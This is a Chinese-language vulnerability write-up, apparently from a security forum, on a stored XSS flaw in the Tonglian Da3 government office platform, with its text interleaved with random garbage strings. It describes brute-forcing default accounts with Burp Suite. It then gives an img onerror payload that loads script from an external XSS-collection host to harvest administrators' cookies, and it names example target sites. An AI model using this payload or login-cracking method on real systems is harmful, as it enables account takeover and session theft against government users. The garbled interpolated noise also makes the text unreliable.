* a, M/ V( F) p& _0 m
& \- r& K6 T2 T0 ]- A3 R
同联Da3协同办公平台后台通用储存型xss漏洞3 t; _( o: _% K& j
/ E' j; X! T7 u# r" C+ _& m
7 q! i8 V- n8 M5 |' E; I! ~
平台简介:9 L2 D4 ] d$ `( J7 Q9 I# q! U
2 R/ e3 [8 X, f: c ; Q" G$ C' K9 I2 q/ m. F8 \$ u
. u) {) z o" X/ j0 \7 T
1 I( t, P h5 s0 L8 W, l6 `# a: } ! I2 Q0 ]# x# {* ]" `" n
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
1 r( V7 w2 n& a9 G9 Q5 c同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
/ b4 G5 v o1 o9 b) H
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!3 l5 H4 y% _2 r. v/ v8 M2 W+ M7 A
* [1 V' j! N' @- {4 G : p, I. d. W N4 S
, |6 M3 [$ d0 K k: e
. ^5 |( y% b" @2 Q7 A( f/ X
' i. \& O) U- r0 p# S; p0 C
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
- c. e- C1 }: z# F
I$ J3 @4 H0 o: \ 5 U: I, M% Z* O4 D$ U
3 n, k* U) t8 H2 ^
3 p7 q" _: Q* ^6 x' A
4 R% ?1 g" s+ v' B8 n$ G4 H http://1.1.1.1:7197/cap-aco/#(案例2-): ?7 W* K4 s0 g8 ?
+ h" Q% S9 L9 p+ E0 ?! p
# p3 @- ~, \9 ]7 H9 p7 P
http://www.XXOO.com (案例1-官网网站)
/ [6 H- Z$ s i h* Z7 D5 Y5 Q
% g7 M7 r( t# q7 c1 c( q 8 ?) `/ |+ |! \. i: Z/ L
漏洞详情:1 V, q& P; L: w e
* h9 G$ ^9 `8 |5 l2 s
& a* Y7 D7 {+ l6 }/ d5 b" M4 _4 U4 a
案例一、
, P a n8 P8 a! C' b
( f# u; z$ e6 G9 Q/ X3 O M/ i
3 H7 ~7 j! g. w% S0 J9 e* S" V
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
- _4 w; n# V8 w, x9 W. i+ b
2 [3 }# A) r! N; d7 O
( h0 ]; R. U P% O; p0 Z9 K0 b 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
4 i6 p0 `# t, y5 A
8 C. @; J5 o. c, H. Z7 N, V5 p% h
. c4 f0 o! a/ f7 G2 O3 J+ T" R2 V) z! }! M : \% I* v6 Z0 }7 a; j' s
3 {- j4 o2 o6 o4 W9 S" j q* V
0 |4 {0 [9 D ?$ g/ Y" \
1 N$ I2 X8 k: Y" [+ X) V, v
5 y/ k% }. L8 \6 S& s$ Y / t5 @( j5 m# M" \. U* h! e
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
2 D& H; I- j; T, H
- k7 E- x9 J4 \7 x; H
- {1 {" ?1 i) e& u( J& U: Q $ g1 w2 m* `! g# i# z+ e; Y
I8 c8 j0 z9 E" M
8 @, J6 p2 O& V' `
4 b% y7 y2 t r/ @) X3 F2 {! e
9 ^" X3 d5 ?* Q% ^' M" s 1 n0 U) P: p" }. j* P1 M
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 ; F5 n6 V. `7 _
6 m$ L6 u( j/ W$ h( [
A& x9 `2 J' j% M
4 Y& `3 c( q9 I* V: i" E
: o0 }! K( x: C* R. l% s1 U 9 B" A6 l7 @! ]9 p
<img src=x4 b: f5 B: }7 t. m) J% V' r
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
( l1 v5 U9 P. _& t
9 \& T2 l+ @/ j5 ?1 ~* t - p1 w+ I+ d' a( I/ y4 K$ a- \
! c/ p1 i# H1 h
% p! u1 j$ l. u0 {$ g$ z6 l
. |1 F4 }6 H9 [# O
然后发送,接收cookie如图: & b$ y+ T4 Z% [) h; h2 N! a
# t- [( d! ^/ Q' b: _ h0 P' h4 M0 J $ G- X4 q& n$ X' R5 o
- X5 b: y! w$ \: p% B" y4 L7 p/ w6 ]# t
- P. e" |* B' N T5 q: s 0 q }5 v- i6 }# g7 V3 m
/ j" L& Z" U; R2 k F" f/ t
& X# s: y8 @' L
: R( d; j2 i: F7 M
$ l0 I/ i/ F6 I0 o9 u) ^/ A6 X; U t8 p
! S, g9 s# C: ^2 |
% v: [; S, }9 u* A9 m, _- s % @# L- ~7 L& o, ^* `& a! R- ^% A
! Q. F- J/ T0 c6 S2 A ( V7 o, u- K: a6 ~( O1 [
6 g$ Y0 I+ E8 M( v( F) |8 ^9 K3 s; H
3 f/ U8 t" L7 ]0 m
/ E0 O* U% N4 P" `/ {& m* w
0 J: j7 G7 J! _, E* b8 ^; ~: T
4 c' Y4 _$ a# Z. x' P, B; L
7 X( F+ [( e Y
! ?! y! T5 d/ a
+ }- @8 B% d$ Z' k/ ?* ^* [" S
% V$ E$ H5 [4 _- @* H# b1 q2 ?7 x
案例2、
( v( R' T& T2 @. I+ `! B- N [2 h
0 X, O! r' k. o* y
, C" C+ M; V8 H: `( K* F- H0 i
前面步骤都一样,下面看效果图: : x% E& y+ m2 l. _% ~- ]% D
+ x: i# U" r8 _! h/ ^
^4 T" K- x S' K( _, _$ Y6 z
. A+ |) G# i! v( w4 j. d
& y* E4 h/ h. j& m$ ?; H 9 D, d A0 Y; U) {7 J6 A
6 W- k9 R. f8 r8 f( s
8 W4 m0 l) I0 u/ z
) [) R) r0 d. `8 i- ^
5 W% u }% I$ u
9 Z7 M, @0 H5 Z8 A; e * ` e9 d6 M' O* ]2 [0 J3 p, r
8 H- [% {$ [' e; \* }; H
3 m* \# }% r4 a$ Y: r, v
$ s1 Y/ ]2 |7 P8 t5 s
# r) }) w9 D1 x0 `
- v3 m+ q& B+ f- Q0 i; g6 D/ e* E: }# C
3 r( H+ l1 b ^: B8 _0 ` 6 ]. }9 r0 t( G; L) Z. T' `" V
* Y9 @- N4 r0 j/ ^" W
$ S! f( l+ v9 q3 v j3 i# F
3 s0 t, L4 R" r8 \) D
/ B, s. j0 H( I4 {; `6 b& X6 ~5 z 4 ?! Y5 y6 S$ \; |
8 N/ u3 P+ _1 c$ c% Z
$ B9 G+ [" V1 ^) u6 Z# m
& _4 x3 ]2 I+ a ( G# g: k5 R3 T8 d1 u$ s
" M9 s; b# L) ^# b